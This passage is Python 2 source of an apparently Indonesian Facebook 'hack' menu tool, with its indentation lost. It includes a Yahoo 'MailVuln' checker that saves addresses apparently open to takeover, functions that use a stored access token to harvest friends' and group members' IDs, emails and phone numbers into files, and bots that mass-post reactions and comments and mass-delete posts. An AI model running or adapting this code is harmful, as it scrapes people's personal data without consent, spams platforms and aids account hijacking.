jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
